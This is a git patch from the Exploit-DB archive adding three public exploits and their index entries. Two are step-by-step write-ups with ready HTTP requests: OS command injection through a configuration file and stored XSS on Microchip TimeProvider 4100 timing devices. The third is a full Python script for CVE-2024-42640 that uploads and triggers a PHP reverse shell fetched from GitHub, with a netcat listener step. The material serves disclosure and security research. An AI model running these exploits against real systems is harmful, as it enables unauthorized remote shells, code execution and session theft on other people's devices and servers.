From f8c80e2b5d5701709f9991339f1aabc9e591c6f2 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 5 Apr 2025 00:16:29 +0000 Subject: [PATCH] DB: 2025-04-05 4 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) --- exploits/hardware/remote/52119.NA | 175 ++++++++++++++++++++++++++++++ exploits/hardware/remote/52120.NA | 175 ++++++++++++++++++++++++++++++ exploits/multiple/remote/52121.py | 139 ++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 492 insertions(+) create mode 100644 exploits/hardware/remote/52119.NA create mode 100644 exploits/hardware/remote/52120.NA create mode 100755 exploits/multiple/remote/52121.py diff --git a/exploits/hardware/remote/52119.NA b/exploits/hardware/remote/52119.NA new file mode 100644 index 000000000..feec97aa4 --- /dev/null +++ b/exploits/hardware/remote/52119.NA @@ -0,0 +1,175 @@ +# Exploit Title: Microchip TimeProvider 4100 Grandmaster Config File - Remote Code Execution (RCE) + +# Exploit Author: Armando Huesca Prida + +# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli + +# Date of Disclosure: 27/06/2024 + +# Date of CVE Publication: 4/10/2024 + +# Exploit Publication: 10/10/2024 + +# Vendor Homepage: https://www.microchip.com/ + +# Version: Firmware release 1.0 through 2.4.7 + +# Tested on: Firmware release 2.3.12 + +# CVE: CVE-2024-9054 + +# External References: + +# URL: https://www.cve.org/cverecord?id=CVE-2024-9054 + +# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html + +# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file + +# URL: https://www.gruppotim.it/it/footer/red-team.html + + + + + +# Vulnerability Description: + + + +A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution. + + + + + +# Exploitation Steps: + + + +1- Perform login into the device's management web interface. + +2- Download the device's configuration file. + +3- Substitute the "secret_key" value with the malicious payload. + +4- Save the new configuration file containing the OS command to be executed. + +5- Restore and submit the new configuration. + +6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload. + + + + + +# Example of malicious XML config file: + + + + + +[...] + + + + [...] + + + + 192.168.1.1 + + `ping 192.168.1.20` + + [...] + + + + [...] + + + +[...] + + + +# Proof of Concept - PoC: + + + +Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request: + +- [session cookie] + +- [XML configuration file containing the injection on "secret_key" tag] + +- [Web account password in clear-text] + +- [device IP] + + + + + +# Exploit - Restore and submit config file HTTP Request: + + + +POST /config_restore HTTP/1.1 + +Host: [device IP] + +Cookie: ci_session=[session cookie] + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate, br + +Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002 + +Content-Length: 206640 + +Origin: https://[device IP] + +Referer: https://[device IP]/configbackuprestore + +Sec-Fetch-Dest: empty + +Sec-Fetch-Mode: cors + +Sec-Fetch-Site: same-origin + +Te: trailers + +Connection: keep-alive + + + +-----------------------------182708909322642582691204887002 + +Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt" + +Content-Type: text/plain + + + +[XML configuration file containing the injection on "secret_key" tag] + +-----------------------------182708909322642582691204887002 + +Content-Disposition: form-data; name="pword" + + + +[Web account password in clear-text] + +-----------------------------182708909322642582691204887002-- + + + + + +# End \ No newline at end of file diff --git a/exploits/hardware/remote/52120.NA b/exploits/hardware/remote/52120.NA new file mode 100644 index 000000000..04d6f8e24 --- /dev/null +++ b/exploits/hardware/remote/52120.NA @@ -0,0 +1,175 @@ +# Exploit Title: Microchip TimeProvider 4100 Grandmaster (banner) - Stored XSS + +# Exploit Author: Armando Huesca Prida + +# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli + +# Date of Disclosure: 27/06/2024 + +# Date of CVE Publication: 4/10/2024 + +# Exploit Publication: 10/10/2024 + +# Vendor Homepage: https://www.microchip.com/ + +# Version: Firmware release 1.0 through 2.4.7 + +# Tested on: Firmware release 2.3.12 + +# CVE: CVE-2024-43687 + +# External References: + +# URL: https://www.cve.org/cverecord?id=CVE-2024-43687 + +# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html + +# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner + +# URL: https://www.gruppotim.it/it/footer/red-team.html + + + + + +# Vulnerability Description: + + + +The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context. + + + + + +# Exploitation Steps: + + + +1- Log in to the device's web management interface. + +2- Open the banner configuration panel. + +3- Select the "custom banner" feature. + +4- Insert the malicious JavaScript payload. + +5- Apply and save the system configuration containing the custom banner. + +6- Victims who connect to the device's web management interface will execute the malicious payload in their browser. + + + + + +# Example of malicious JavaScript payload: + + + + + + + + + +# Proof of Concept - PoC: + + + +By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below: + +- [session cookie] + +- [malicious JavaScript payload] + +- [device IP] + + + + + +# Exploit - HTTP Request: + + + +POST /bannerconfig HTTP/1.1 + +Host: [device IP] + +Cookie: ci_session=[session cookie] + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate, br + +Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502 + +Content-Length: 673 + +Origin: https://[device IP] + +Referer: https://[device IP]/bannerconfig + +Upgrade-Insecure-Requests: 1 + +Sec-Fetch-Dest: document + +Sec-Fetch-Mode: navigate + +Sec-Fetch-Site: same-origin + +Sec-Fetch-User: ?1 + +Te: trailers + +Connection: keep-alive + + + +-----------------------------9680247575877256312575038502 + +Content-Disposition: form-data; name="user_level" + + + +1 + +-----------------------------9680247575877256312575038502 + +Content-Disposition: form-data; name="bannerradio" + + + +CUSTOMIZED + +-----------------------------9680247575877256312575038502 + +Content-Disposition: form-data; name="txtcustom" + + + +[malicious JavaScript payload] + + + +-----------------------------9680247575877256312575038502 + +Content-Disposition: form-data; name="action" + + + +applybanner + +-----------------------------9680247575877256312575038502-- + + + + + + + +# End \ No newline at end of file diff --git a/exploits/multiple/remote/52121.py b/exploits/multiple/remote/52121.py new file mode 100755 index 000000000..8a8caaa90 --- /dev/null +++ b/exploits/multiple/remote/52121.py @@ -0,0 +1,139 @@ +#!/bin/python3 + +# Exploit Title: Unauthenticated RCE via Angular-Base64-Upload Library +# Date: 10 October 2024 +# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9) +# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9) +# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload +# Software Link: https://github.com/adonespitogo/angular-base64-upload +# Version: prior to v0.1.21 +# Tested on: Arch Linux +# CVE : CVE-2024-42640 +# Severity: Critical - 10.0 (CVSS 4.0) +# Github Link : https://github.com/rvizx/CVE-2024-42640 +# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html + +# DISCLAIMER: + +# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes. +# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems. +# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities. +# Any actions taken with this code are undertaken at the sole discretion and risk of the user. +# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems. +# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited. +# By using this code, you agree to assume all responsibility and liability for your actions. +# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code. +# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software. +# Proceed with caution and use this code responsibly. + + +import re +import subprocess +import requests +import sys +import os +import uuid +import base64 + + +def banner(): + print(''' + + \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit + \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9 + https://github.com/rvizx/\033[0mCVE-2024-42640 + +''') + + +def enum(url): + print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ") + target = f"{url}/bower_components/angular-base64-upload/demo/index.html" + r = requests.head(target) + if r.status_code == 200: + print("\033[94m[inf]:\033[0m target is using bower_components") + else: + print("\033[94m[inf]:\033[0m target is not using bower_components") + target = f"{url}/node_modules/angular-base64-upload/demo/index.html" + r = requests.head(target) + if r.status_code == 200: + print("\033[94m[inf]:\033[0m target is using node_modules") + else: + print("\033[94m[inf]:\033[0m target is not using node_modules") + print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html") + print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory") + print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html") + print("\033[91m[err]:\033[0m exiting..") + exit() + + version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None) + print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version) + exploit(target) + + + + + +def exploit(target): + print(f"[dbg]: {target}") + target_server_url = target.replace("index.html","server.php") + print(f"[dbg]: {target_server_url}") + payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" + print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..") + ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ") + port = input("\033[93m[ins]:\033[0m enter listenter port: ") + print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}") + input("\033[93m[ins]:\033[0m press enter to continue...") + print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...") + response = requests.get(payload_url) + if response.status_code == 200: + php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input + payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name + with open(payload_name, "w") as file: + file.write(php_code) + else: + print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.") + print("\033[91m[err]:\033[0m exiting..") + exit() + + with open(payload_name, 'rb') as file: + file_content = file.read() + base64_payload = base64.b64encode(file_content).decode('utf-8') + + headers = { + 'Content-Type': 'application/json', + } + + json_data = { + 'base64': base64_payload, + 'filename': payload_name, + } + + response = requests.post(target_server_url, headers=headers, json=json_data, verify=False) + print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code) + updemo_endpoint = f"uploads/{payload_name}" + print(f"[dbg]: {updemo_endpoint}") + payload_url = target_server_url.replace("server.php",updemo_endpoint) + print(f"[dbg]: {payload_url}") + if response.status_code == 200: + print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}") + print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..") + r = requests.get(payload_url) + + if r.status_code == 200: + print("\033[94m[inf]:\033[0m process complete!") + else: + print("\033[91m[err]:\033[0m something went wrong!") + + print("\033[93m[ins]:\033[0m please check the listener for incoming connections.") + + +if __name__ == "__main__": + try: + banner() + url = sys.argv[1] + print(f"\033[94m[inf]:\033[0m target: {url}") + enum(url) + except: + print("[usg]: ./exploit.py ") + exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ac906de02..24a4b9573 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3760,6 +3760,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51850,exploits/hardware/remote/51850.txt,"Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)",2024-03-03,"Alok kumar",remote,hardware,,2024-03-03,2024-03-03,0,,,,,, 40120,exploits/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,remote,hardware,,2016-07-18,2016-12-09,0,CVE-2016-3989;CVE-2016-3962,,,,,https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,,2016-10-20,2016-10-27,0,CVE-2013-4863;CVE-2016-6255,,,,, +52119,exploits/hardware/remote/52119.NA,"Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-9054,,,,, +52120,exploits/hardware/remote/52120.NA,"Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)",2025-04-04,"Armando Huesca Prida",remote,hardware,,2025-04-04,2025-04-04,0,CVE-2024-43687,,,,, 45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,,2018-07-17,2018-07-17,0,,,,,, 45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,,2018-10-10,2018-10-10,0,CVE-2018-14847,Remote,,,, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,,2017-03-24,2017-03-24,0,CVE-2017-7240,,,,, @@ -10632,6 +10634,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21116,exploits/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",remote,multiple,,2001-09-28,2012-09-06,1,CVE-2001-1528;OSVDB-20236,,,,,https://www.securityfocus.com/bid/3371/info 21115,exploits/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",remote,multiple,,2001-09-28,2012-09-06,1,CVE-2001-1170;OSVDB-9788,,,,,https://www.securityfocus.com/bid/3370/info 22130,exploits/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,remote,multiple,,2003-01-06,2012-10-21,1,CVE-2003-1271;OSVDB-59639,,,,,https://www.securityfocus.com/bid/6529/info +52121,exploits/multiple/remote/52121.py,"Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)",2025-04-04,"Ravindu Wickramasinghe",remote,multiple,,2025-04-04,2025-04-04,0,CVE-2024-42640,,,,, 33497,exploits/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4494;OSVDB-61772,,,,,https://www.securityfocus.com/bid/37712/info 18442,exploits/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,remote,multiple,,2012-01-31,2012-01-31,1,CVE-2012-0053;OSVDB-78556,,,,,https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 21067,exploits/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,remote,multiple,,2001-08-21,2012-09-04,1,OSVDB-86902,,,,,https://www.securityfocus.com/bid/3169/info